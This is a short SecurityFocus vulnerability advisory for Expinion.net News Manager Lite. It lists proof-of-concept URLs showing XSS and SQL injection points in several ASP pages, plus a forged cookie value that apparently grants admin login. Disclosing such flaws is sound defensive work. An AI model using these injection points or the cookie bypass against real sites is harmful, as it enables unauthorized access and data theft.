Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Expinion.net News Manager Lite Multiple Vulnerabilities

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/comment_add.asp?ID=3&email=[XSS]
http://www.example.com/search.asp?search=[XSS]
http://www.example.com/category_news_headline.asp?ID=2&n=[XSS]
http://www.example.com/more.asp?ID='[SQL query]
http://www.example.com/category_news.asp?ID='[SQL]
http://www.example.com/news_sort.asp?filter='[SQL]
Cookie: NEWS%5FLOGIN=ADMIN=1&ID=1







 

Privacy Statement
Copyright 2009, SecurityFocus